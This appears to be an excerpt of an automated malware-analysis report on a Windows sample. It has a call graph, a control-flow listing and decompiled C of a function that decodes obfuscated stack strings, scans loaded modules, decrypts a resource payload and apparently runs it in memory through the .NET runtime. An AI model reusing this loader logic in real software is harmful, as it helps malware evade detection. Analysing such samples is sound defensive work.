calls __getptd_noexit 25750->25775 25755 40b8bc RtlAllocateHeap 25755->25757 25757->25755 25758 40b870 25757->25758 25759 40b8ec 25757->25759 25762 40b8f1 25757->25762 25764 40b8f8 25757->25764 25770 40b7fe 63 API calls 4 library calls 25757->25770 25771 40d2e3 6 API calls __decode_pointer 25757->25771 25758->25757 25765 40ec4d 63 API calls 2 library calls 25758->25765 25766 40eaa2 63 API calls 7 library calls 25758->25766 25767 40e7ee 25758->25767 25772 40bfc1 63 API calls __getptd_noexit 25759->25772 25773 40bfc1 63 API calls __getptd_noexit 25762->25773 25764->25743 25765->25758 25766->25758 25776 40e7c3 GetModuleHandleW 25767->25776 25770->25757 25771->25757 25772->25762 25773->25764 25774->25750 25775->25764 25777 40e7d7 GetProcAddress 25776->25777 25778 40e7ec ExitProcess 25776->25778 25777->25778 25779 40e7e7 CorExitProcess 25777->25779 25779->25778 25782 41265c 25780->25782 25784 4126c9 25782->25784 25787 416836 73 API calls x_ismbbtype_l 25782->25787 25783 4127c7 25783->25596 25783->25598 25784->25783 25785 416836 73 API calls _parse_cmdline 25784->25785 25785->25784 25786->25591 25787->25782 25788->25604 25789->25611 25790->25614 25791->25608 25792->25608 25795 41358c 25793->25795 25794 41046e __encode_pointer 6 API calls 25794->25795 25795->25794 25796 4135a4 25795->25796 25796->25619 25797->25621 25801 40b9aa __msize _strnlen 25798->25801 25799 40b9b8 25854 40bfc1 63 API calls __getptd_noexit 25799->25854 25801->25799 25804 40b9ec 25801->25804 25802 40b9bd 25855 40e744 6 API calls 2 library calls 25802->25855 25805 40d6e0 __lock 63 API calls 25804->25805 25806 40b9f3 25805->25806 25856 40b917 121 API calls 3 library calls 25806->25856 25808 40b9ff 25857 40ba18 LeaveCriticalSection _doexit 25808->25857 25809 40b9cd __msize 25809->25625 25812 4017cc _realloc 25811->25812 25812->25629 25815 40af70 25813->25815 25814 40b84d _malloc 63 API calls 25814->25815 25815->25814 25816 40af8a 25815->25816 25820 40af8c std::bad_alloc::bad_alloc 25815->25820 25858 40d2e3 6 API calls __decode_pointer 25815->25858 25816->25634 25818 40afb2 25860 40af49 63 API calls std::exception::exception 25818->25860 25820->25818 25859 40d2bd 74 API calls __cinit 25820->25859 25821 40afbc 25861 40cd39 RaiseException 25821->25861 25824 40afca 25826 401903 lstrlenA 25825->25826 25827 4018fc 25825->25827 25862 4017e0 73 API calls 3 library calls 25826->25862 25827->25657 25829 40191f MultiByteToWideChar 25830 401940 GetLastError 25829->25830 25831 401996 25829->25831 25832 40194b MultiByteToWideChar 25830->25832 25833 40198d 25830->25833 25831->25657 25863 4017e0 73 API calls 3 library calls 25832->25863 25833->25831 25864 401030 GetLastError 25833->25864 25835 401970 MultiByteToWideChar 25835->25833 25838 40af66 75 API calls 25837->25838 25839 40187c 25838->25839 25840 401885 SysAllocString 25839->25840 25841 4018a4 25839->25841 25840->25841 25841->25659 25843 40231a SafeArrayUnaccessData 25842->25843 25843->25666 25845 4019aa InterlockedDecrement 25844->25845 25850 4019df VariantClear 25844->25850 25846 4019b8 25845->25846 25845->25850 25847 4019c2 SysFreeString 25846->25847 25848 4019c9 25846->25848 25846->25850 25847->25848 25865 40aec0 64 API calls 2 library calls 25848->25865 25850->25674 25851->25637 25852->25640 25853->25656 25854->25802 25856->25808 25857->25809 25858->25815 25859->25818 25860->25821 25861->25824 25862->25829 25863->25835 25865->25850 25867 40e8ea __msize 25866->25867 25868 40d6e0 __lock 63 API calls 25867->25868 25869 40e8f1 25868->25869 25870 40e9ba __initterm 25869->25870 25871 40e91d 25869->25871 25885 40e9f5 25870->25885 25890 4104e9 6 API calls __crt_waiting_on_module_handle 25871->25890 25875 40e928 25880 40e9aa __initterm 25875->25880 25891 4104e9 6 API calls __crt_waiting_on_module_handle 25875->25891 25878 40e9e9 25881 40e7ee _malloc 4 API calls 25878->25881 25879 40e9f2 __msize 25879->25678 25880->25870 25881->25879 25882 4104e0 6 API calls __init_pointers 25883 40e93d 25882->25883 25883->25880 25883->25882 25884 4104e9 6 API calls __decode_pointer 25883->25884 25884->25883 25886 40e9d6 25885->25886 25887 40e9fb 25885->25887 25886->25879 25889 40d606 LeaveCriticalSection 25886->25889 25892 40d606 LeaveCriticalSection 25887->25892 25889->25878 25890->25875 25891->25883 25892->25886 25455 22f9920 25456 22f996b OpenSCManagerW 25455->25456 25458 22f99b4 25456->25458 25459 22f0980 25460 22f0989 25459->25460 25462 22f4a25 25459->25462 25465 22f90d0 25462->25465 25467 22f90e3 25465->25467 25469 22f9180 25467->25469 25470 22f91c8 VirtualProtect 25469->25470 25472 22f4a47 25470->25472

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 34 401cd0-401cd4 24->34 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 41 401f1c-401f2f 30->41 42 401f5f-401f69 30->42 35 401cf0-401cf2 34->35 36 401cd6-401cd8 34->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->48 49 401f77-401f8d call 401560 43->49 44->43 45->34 45->39 46->7 50 401d0f 46->50 47->42 48->5 85 4021aa-4021c0 48->85 49->48 54 401d10-401d2e call 401650 50->54 61 401d30-401d34 54->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 65 401d55-401d57 63->65 67 401d3a-401d40 64->67 68 401d4c-401d4e 64->68 65->25 69 401d5d-401d7b call 401650 65->69 67->63 71 401d42-401d4a 67->71 68->65 76 401d80-401d84 69->76 71->61 71->68 78 401da0-401da2 76->78 79 401d86-401d88 76->79 84 401da5-401da7 78->84 82 401d8a-401d90 79->82 83 401d9c-401d9e 79->83 82->78 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->76 86->83 87->7 87->54 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-402352 call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 128 402354-402355 SafeArrayDestroy 122->128 129 40235b-402361 122->129 123->122 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-4023a2 call 4018d0 SafeArrayCreateVector 133->135 134->135 139 4023a4-4023a9 call 40ad90 135->139 140 4023ae-4023b4 135->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99
                              C-Code - Quality: 77%
                              			E004019F0(void* __edx, void* __eflags) {
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				void* _t337;
                              				void* _t340;
                              				int _t341;
                              				CHAR* _t344;
                              				intOrPtr* _t349;
                              				int _t350;
                              				long _t352;
                              				signed int _t354;
                              				intOrPtr _t358;
                              				long _t359;
                              				CHAR* _t364;
                              				struct HINSTANCE__* _t365;
                              				CHAR* _t366;
                              				_Unknown_base(*)()* _t367;
                              				int _t368;
                              				int _t369;
                              				int _t370;
                              				intOrPtr* _t376;
                              				int _t378;
                              				intOrPtr _t379;
                              				intOrPtr* _t381;
                              				int _t383;
                              				intOrPtr* _t384;
                              				int _t385;
                              				int _t396;
                              				int _t399;
                              				int _t402;
                              				int _t405;
                              				intOrPtr* _t407;
                              				int _t413;
                              				int _t415;
                              				void* _t421;
                              				int _t422;
                              				int _t424;
                              				intOrPtr* _t428;
                              				intOrPtr _t429;
                              				intOrPtr* _t431;
                              				int _t432;
                              				int _t435;
                              				intOrPtr* _t437;
                              				int _t438;
                              				intOrPtr* _t439;
                              				int _t440;
                              				int _t442;
                              				signed int _t448;
                              				signed int _t451;
                              				signed int _t452;
                              				int _t469;
                              				int _t471;
                              				int _t482;
                              				signed int _t486;
                              				intOrPtr* _t488;
                              				intOrPtr* _t490;
                              				intOrPtr* _t492;
                              				intOrPtr _t493;
                              				void* _t494;
                              				struct HRSRC__* _t497;
                              				void* _t514;
                              				int _t519;
                              				intOrPtr* _t520;
                              				void* _t524;
                              				void* _t525;
                              				struct HINSTANCE__* _t526;
                              				intOrPtr _t527;
                              				void* _t531;
                              				void* _t535;
                              				struct HRSRC__* _t536;
                              				intOrPtr* _t537;
                              				intOrPtr* _t539;
                              				int _t542;
                              				int _t543;
                              				intOrPtr* _t547;
                              				intOrPtr* _t548;
                              				intOrPtr* _t549;
                              				intOrPtr* _t550;
                              				void* _t551;
                              				intOrPtr _t552;
                              				int _t555;
                              				void* _t556;
                              				void* _t557;
                              				void* _t558;
                              				void* _t559;
                              				void* _t560;
                              				void* _t561;
                              				void* _t562;
                              				intOrPtr* _t563;
                              				void* _t564;
                              				void* _t565;
                              				void* _t566;
                              				void* _t567;
                              
                              				_t567 = __eflags;
                              				_t494 = __edx;
                              				__imp__OleInitialize(0); // executed
                              				 *((char*)(_t556 + 0x18)) = 0xe0;
                              				 *((char*)(_t556 + 0x19)) = 0x3b;
                              				 *((char*)(_t556 + 0x1a)) = 0x8d;
                              				 *((char*)(_t556 + 0x1b)) = 0x2a;
                              				 *((char*)(_t556 + 0x1c)) = 0xa2;
                              				 *((char*)(_t556 + 0x1d)) = 0x2a;
                              				 *((char*)(_t556 + 0x1e)) = 0x2a;
                              				 *((char*)(_t556 + 0x1f)) = 0x41;
                              				 *((char*)(_t556 + 0x20)) = 0xd3;
                              				 *((char*)(_t556 + 0x21)) = 0x20;
                              				 *((char*)(_t556 + 0x22)) = 0x64;
                              				 *((char*)(_t556 + 0x23)) = 6;
                              				 *((char*)(_t556 + 0x24)) = 0x8a;
                              				 *((char*)(_t556 + 0x25)) = 0xf7;
                              				 *((char*)(_t556 + 0x26)) = 0x3d;
                              				 *((char*)(_t556 + 0x27)) = 0x9d;
                              				 *((char*)(_t556 + 0x28)) = 0xd9;
                              				 *((char*)(_t556 + 0x29)) = 0xee;
                              				 *((char*)(_t556 + 0x2a)) = 0x15;
                              				 *((char*)(_t556 + 0x2b)) = 0x68;
                              				 *((char*)(_t556 + 0x2c)) = 0xf4;
                              				 *((char*)(_t556 + 0x2d)) = 0x76;
                              				 *((char*)(_t556 + 0x2e)) = 0xb9;
                              				 *((char*)(_t556 + 0x2f)) = 0x34;
                              				 *((char*)(_t556 + 0x30)) = 0xbf;
                              				 *((char*)(_t556 + 0x31)) = 0x1e;
                              				 *((char*)(_t556 + 0x32)) = 0xe7;
                              				 *((char*)(_t556 + 0x33)) = 0x78;
                              				 *((char*)(_t556 + 0x34)) = 0x98;
                              				 *((char*)(_t556 + 0x35)) = 0xe9;
                              				 *((char*)(_t556 + 0x36)) = 0x6f;
                              				 *((char*)(_t556 + 0x37)) = 0xb4;
                              				 *((char*)(_t556 + 0x38)) = 0;
                              				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                              				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                              				_t557 = _t556 + 0xc;
                              				if(_t337 == 0x41b2a0) {
                              					L80:
                              					__eflags = 0;
                              					return 0;
                              				} else {
                              					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                              					_t525 = _t340;
                              					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                              					 *((char*)(_t557 + 0x64)) = 0xce;
                              					 *((char*)(_t557 + 0x65)) = 0x27;
                              					 *((char*)(_t557 + 0x66)) = 0x9c;
                              					 *((char*)(_t557 + 0x67)) = 0x1a;
                              					 *((char*)(_t557 + 0x68)) = 0x95;
                              					 *((char*)(_t557 + 0x69)) = 0x2e;
                              					 *((char*)(_t557 + 0x6a)) = 0x22;
                              					 *((char*)(_t557 + 0x6b)) = 0x57;
                              					 *((char*)(_t557 + 0x6c)) = 0x91;
                              					 *((char*)(_t557 + 0x6d)) = 0x21;
                              					 *((char*)(_t557 + 0x6e)) = 0x57;
                              					 *((char*)(_t557 + 0x6f)) = 0x3a;
                              					 *((char*)(_t557 + 0x70)) = 0xf8;
                              					 *((char*)(_t557 + 0x71)) = 0x98;
                              					 *((char*)(_t557 + 0x72)) = 0x5b;
                              					 *((char*)(_t557 + 0x73)) = 0xf4;
                              					 *((char*)(_t557 + 0x74)) = 0xb5;
                              					 *((char*)(_t557 + 0x75)) = 0x87;
                              					 *((char*)(_t557 + 0x76)) = 0x7b;
                              					 *((char*)(_t557 + 0x77)) = 0xf;
                              					 *((char*)(_t557 + 0x78)) = 0xf4;
                              					 *((char*)(_t557 + 0x79)) = 0x76;
                              					 *((char*)(_t557 + 0x7a)) = 0xb9;
                              					 *((char*)(_t557 + 0x7b)) = 0x34;
                              					 *((char*)(_t557 + 0x7c)) = 0xbf;
                              					 *((char*)(_t557 + 0x7d)) = 0x1e;
                              					 *((char*)(_t557 + 0x7e)) = 0xe7;
                              					 *((char*)(_t557 + 0x7f)) = 0x78;
                              					 *((char*)(_t557 + 0x80)) = 0x98;
                              					 *((char*)(_t557 + 0x81)) = 0xe9;
                              					 *((char*)(_t557 + 0x82)) = 0x6f;
                              					 *((char*)(_t557 + 0x83)) = 0xb4;
                              					 *((char*)(_t557 + 0x84)) = 0;
                              					 *((char*)(_t557 + 0x18)) = 0xc0;
                              					 *((char*)(_t557 + 0x19)) = 0x38;
                              					 *((char*)(_t557 + 0x1a)) = 0x8d;
                              					 *((char*)(_t557 + 0x1b)) = 0x1f;
                              					 *((char*)(_t557 + 0x1c)) = 0x8e;
                              					 *((char*)(_t557 + 0x1d)) = 0x30;
                              					 *((char*)(_t557 + 0x1e)) = 0x65;
                              					 *((char*)(_t557 + 0x1f)) = 0x47;
                              					 *((char*)(_t557 + 0x20)) = 0xd3;
                              					 *((char*)(_t557 + 0x21)) = 0x29;
                              					 *((char*)(_t557 + 0x22)) = 0x3b;
                              					 *((char*)(_t557 + 0x23)) = 0x56;
                              					 *((char*)(_t557 + 0x24)) = 0xf8;
                              					 *((char*)(_t557 + 0x25)) = 0x98;
                              					 *((char*)(_t557 + 0x26)) = 0x5b;
                              					 *((char*)(_t557 + 0x27)) = 0xf4;
                              					 *((char*)(_t557 + 0x28)) = 0xb5;
                              					 *((char*)(_t557 + 0x29)) = 0x87;
                              					 *((char*)(_t557 + 0x2a)) = 0x7b;
                              					 *((char*)(_t557 + 0x2b)) = 0xf;
                              					 *((char*)(_t557 + 0x2c)) = 0xf4;
                              					 *((char*)(_t557 + 0x2d)) = 0x76;
                              					 *((char*)(_t557 + 0x2e)) = 0xb9;
                              					 *((char*)(_t557 + 0x2f)) = 0x34;
                              					 *((char*)(_t557 + 0x30)) = 0xbf;
                              					 *((char*)(_t557 + 0x31)) = 0x1e;
                              					 *((char*)(_t557 + 0x32)) = 0xe7;
                              					 *((char*)(_t557 + 0x33)) = 0x78;
                              					 *((char*)(_t557 + 0x34)) = 0x98;
                              					 *((char*)(_t557 + 0x35)) = 0xe9;
                              					 *((char*)(_t557 + 0x36)) = 0x6f;
                              					 *((char*)(_t557 + 0x37)) = 0xb4;
                              					 *((char*)(_t557 + 0x38)) = 0;
                              					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                              					if(_t341 == 0) {
                              						L38:
                              						CloseHandle(_t525);
                              						_t526 = GetModuleHandleA(0);
                              						 *((char*)(_t557 + 0x1c)) = 0xfc;
                              						 *((char*)(_t557 + 0x1d)) = 0xb;
                              						 *((char*)(_t557 + 0x1e)) = 0xff;
                              						 *((char*)(_t557 + 0x1f)) = 0x75;
                              						 *((char*)(_t557 + 0x20)) = 0xe7;
                              						 *((char*)(_t557 + 0x21)) = 0x44;
                              						 *((char*)(_t557 + 0x22)) = 0x4b;
                              						 *((char*)(_t557 + 0x23)) = 0x23;
                              						 *((char*)(_t557 + 0x24)) = 0xbf;
                              						 *((char*)(_t557 + 0x25)) = 0x45;
                              						 *((char*)(_t557 + 0x26)) = 0x3b;
                              						 *((char*)(_t557 + 0x27)) = 0x56;
                              						 *((char*)(_t557 + 0x28)) = 0xf8;
                              						 *((char*)(_t557 + 0x29)) = 0x98;
                              						 *((char*)(_t557 + 0x2a)) = 0x5b;
                              						 *((char*)(_t557 + 0x2b)) = 0xf4;
                              						 *((char*)(_t557 + 0x2c)) = 0xb5;
                              						 *((char*)(_t557 + 0x2d)) = 0x87;
                              						 *((char*)(_t557 + 0x2e)) = 0x7b;
                              						 *((char*)(_t557 + 0x2f)) = 0xf;
                              						 *((char*)(_t557 + 0x30)) = 0xf4;
                              						 *((char*)(_t557 + 0x31)) = 0x76;
                              						 *((char*)(_t557 + 0x32)) = 0xb9;
                              						 *((char*)(_t557 + 0x33)) = 0x34;
                              						 *((char*)(_t557 + 0x34)) = 0xbf;
                              						 *((char*)(_t557 + 0x35)) = 0x1e;
                              						 *((char*)(_t557 + 0x36)) = 0xe7;
                              						 *((char*)(_t557 + 0x37)) = 0x78;
                              						 *((char*)(_t557 + 0x38)) = 0x98;
                              						 *((char*)(_t557 + 0x39)) = 0xe9;
                              						 *((char*)(_t557 + 0x3a)) = 0x6f;
                              						 *((char*)(_t557 + 0x3b)) = 0xb4;
                              						 *((char*)(_t557 + 0x3c)) = 0;
                              						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                              						_t558 = _t557 + 8;
                              						_t536 = FindResourceA(_t526, _t344, 0xa);
                              						 *(_t558 + 0x50) = _t536;
                              						_t551 = LoadResource(_t526, _t536);
                              						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                              						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                              						_push(0x40022);
                              						_t537 = _t349; // executed
                              						_t350 = E0040AF66(0, _t526, __eflags); // executed
                              						_t559 = _t558 + 8;
                              						 *(_t559 + 0x34) = _t350;
                              						__eflags = _t350;
                              						if(_t350 == 0) {
                              							 *(_t559 + 0x50) = 0;
                              						} else {
                              							E0040BA30(_t526, _t350, 0, 0x40022);
                              							_t486 =  *(_t559 + 0x40);
                              							_t559 = _t559 + 0xc;
                              							 *(_t559 + 0x50) = _t486;
                              						}
                              						E00401300( *(_t559 + 0x50));
                              						_t497 =  *(_t559 + 0x48);
                              						_t352 = SizeofResource(_t526, _t497);
                              						 *(_t559 + 0x40) = _t352;
                              						asm("cdq");
                              						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                              						__eflags = _t354;
                              						if(_t354 > 0) {
                              							_t519 =  *(_t559 + 0x3c);
                              							_t482 = _t537 - _t519;
                              							__eflags = _t482;
                              							 *(_t559 + 0x34) = _t519;
                              							 *(_t559 + 0x88) = _t482;
                              							 *(_t559 + 0x38) = _t354;
                              							do {
                              								_t424 =  *(_t559 + 0x34);
                              								_push( *(_t559 + 0x88) + _t424);
                              								_push(0x400);
                              								_push(_t424);
                              								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                              								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                              								_t179 = _t559 + 0x38;
                              								 *_t179 =  *(_t559 + 0x38) - 1;
                              								__eflags =  *_t179;
                              							} while ( *_t179 != 0);
                              						}
                              						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                              						__eflags = _t448;
                              						if(_t448 < 0) {
                              							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                              							__eflags = _t448;
                              						}
                              						__eflags = _t448;
                              						if(_t448 > 0) {
                              							_t421 =  *(_t559 + 0x40) - _t448;
                              							_push(_t421 + _t537);
                              							_push(_t448);
                              							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                              							__eflags = _t422;
                              							_push(_t422);
                              							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                              						}
                              						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                              						_t560 = _t559 + 0xc;
                              						FreeResource(_t551);
                              						_t552 =  *_t537;
                              						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                              						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                              						_t561 = _t560 + 4;
                              						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                              						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                              						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                              						_t192 = _t537 + 4; // 0x4
                              						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                              						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                              						_t528 = _t527 + 0xe;
                              						 *((char*)(_t561 + 0x34)) = 0xce;
                              						 *((char*)(_t561 + 0x35)) = 0x27;
                              						 *((char*)(_t561 + 0x36)) = 0x9c;
                              						 *((char*)(_t561 + 0x37)) = 0x1a;
                              						 *((char*)(_t561 + 0x38)) = 0x95;
                              						 *((char*)(_t561 + 0x39)) = 0x21;
                              						 *((char*)(_t561 + 0x3a)) = 0x2e;
                              						 *((char*)(_t561 + 0x3b)) = 0xd;
                              						 *((char*)(_t561 + 0x3c)) = 0xdb;
                              						 *((char*)(_t561 + 0x3d)) = 0x29;
                              						 *((char*)(_t561 + 0x3e)) = 0x57;
                              						 *((char*)(_t561 + 0x3f)) = 0x56;
                              						 *((char*)(_t561 + 0x40)) = 0xf8;
                              						 *((char*)(_t561 + 0x41)) = 0x98;
                              						 *((char*)(_t561 + 0x42)) = 0x5b;
                              						 *((char*)(_t561 + 0x43)) = 0xf4;
                              						 *((char*)(_t561 + 0x44)) = 0xb5;
                              						 *((char*)(_t561 + 0x45)) = 0x87;
                              						 *((char*)(_t561 + 0x46)) = 0x7b;
                              						 *((char*)(_t561 + 0x47)) = 0xf;
                              						 *((char*)(_t561 + 0x48)) = 0xf4;
                              						 *((char*)(_t561 + 0x49)) = 0x76;
                              						 *((char*)(_t561 + 0x4a)) = 0xb9;
                              						 *((char*)(_t561 + 0x4b)) = 0x34;
                              						 *((char*)(_t561 + 0x4c)) = 0xbf;
                              						 *((char*)(_t561 + 0x4d)) = 0x1e;
                              						 *((char*)(_t561 + 0x4e)) = 0xe7;
                              						 *((char*)(_t561 + 0x4f)) = 0x78;
                              						 *((char*)(_t561 + 0x50)) = 0x98;
                              						 *((char*)(_t561 + 0x51)) = 0xe9;
                              						 *((char*)(_t561 + 0x52)) = 0x6f;
                              						 *((char*)(_t561 + 0x53)) = 0xb4;
                              						 *((char*)(_t561 + 0x54)) = 0;
                              						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                              						_t562 = _t561 + 0x24;
                              						_t365 = LoadLibraryA(_t364); // executed
                              						_t538 = _t365;
                              						 *((char*)(_t562 + 0x10)) = 0xe0;
                              						 *((char*)(_t562 + 0x11)) = 0x18;
                              						 *((char*)(_t562 + 0x12)) = 0xad;
                              						 *((char*)(_t562 + 0x13)) = 0x36;
                              						 *((char*)(_t562 + 0x14)) = 0x95;
                              						 *((char*)(_t562 + 0x15)) = 0x21;
                              						_t451 = _t562 + 0x134;
                              						 *((char*)(_t562 + 0x1e)) = 0x2a;
                              						 *((char*)(_t562 + 0x1f)) = 0x57;
                              						 *((char*)(_t562 + 0x20)) = 0xda;
                              						 *((char*)(_t562 + 0x21)) = 0xc;
                              						 *((char*)(_t562 + 0x22)) = 0x55;
                              						 *((char*)(_t562 + 0x23)) = 0x25;
                              						 *((char*)(_t562 + 0x24)) = 0x8c;
                              						 *((char*)(_t562 + 0x25)) = 0xf9;
                              						 *((char*)(_t562 + 0x26)) = 0x35;
                              						 *((char*)(_t562 + 0x27)) = 0x97;
                              						 *((char*)(_t562 + 0x28)) = 0xd0;
                              						 *((char*)(_t562 + 0x29)) = 0x87;
                              						 *((char*)(_t562 + 0x2a)) = 0x7b;
                              						 *((char*)(_t562 + 0x2b)) = 0xf;
                              						 *((char*)(_t562 + 0x2c)) = 0xf4;
                              						 *((char*)(_t562 + 0x2d)) = 0x76;
                              						 *((char*)(_t562 + 0x2e)) = 0xb9;
                              						 *((char*)(_t562 + 0x2f)) = 0x34;
                              						 *((char*)(_t562 + 0x30)) = 0xbf;
                              						 *((char*)(_t562 + 0x31)) = 0x1e;
                              						 *((char*)(_t562 + 0x32)) = 0xe7;
                              						 *((char*)(_t562 + 0x33)) = 0x78;
                              						 *((char*)(_t562 + 0x34)) = 0x98;
                              						 *((char*)(_t562 + 0x35)) = 0xe9;
                              						 *((char*)(_t562 + 0x36)) = 0x6f;
                              						 *((char*)(_t562 + 0x37)) = 0xb4;
                              						 *((char*)(_t562 + 0x38)) = 0;
                              						_t366 = E00401650(_t562 + 0x14, _t451);
                              						_t563 = _t562 + 8;
                              						_t367 = GetProcAddress(_t365, _t366);
                              						__eflags = _t367;
                              						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                              						__eflags = _t452;
                              						 *(_t563 + 0x47) = _t452 == 0;
                              						 *0x423480 = _t367;
                              						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                              						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                              						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                              						 *(_t563 + 0x58) = 0;
                              						 *(_t563 + 0x54) = 0;
                              						__eflags = _t452;
                              						if(_t452 != 0) {
                              							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                              							__eflags = _t368;
                              							if(_t368 >= 0) {
                              								__eflags =  *(_t563 + 0x47);
                              								if( *(_t563 + 0x47) == 0) {
                              									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                              									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                              									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                              									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                              									__eflags = _t378;
                              									if(_t378 >= 0) {
                              										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                              										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                              										__eflags = _t383;
                              										if(_t383 >= 0) {
                              											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                              											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                              											__eflags = _t385;
                              											if(_t385 >= 0) {
                              												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                              												E00401870(_t563 + 0x44, _t552, "_._");
                              												_t539 = __imp__#8;
                              												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                              												 *_t539(_t563 + 0x94);
                              												E00401870(_t563 + 0x3c, _t552, "___");
                              												 *_t539(_t563 + 0xa4);
                              												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                              												_t542 =  *(_t563 + 0x58);
                              												__eflags = _t542;
                              												if(_t542 == 0) {
                              													E0040AD90(0x80004003);
                              												}
                              												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                              												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                              												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                              												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                              												_t543 = _t396;
                              												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                              												__imp__#23(_t543, _t563 + 0x48);
                              												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                              												_t564 = _t563 + 0xc;
                              												__imp__#24(_t543);
                              												_t399 =  *(_t564 + 0x54);
                              												__eflags = _t399;
                              												if(_t399 == 0) {
                              													_t399 = E0040AD90(0x80004003);
                              												}
                              												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                              												__eflags = _t543;
                              												if(_t543 != 0) {
                              													__imp__#16(_t543); // executed
                              												}
                              												_t402 =  *(_t564 + 0x34);
                              												__eflags = _t402;
                              												if(_t402 == 0) {
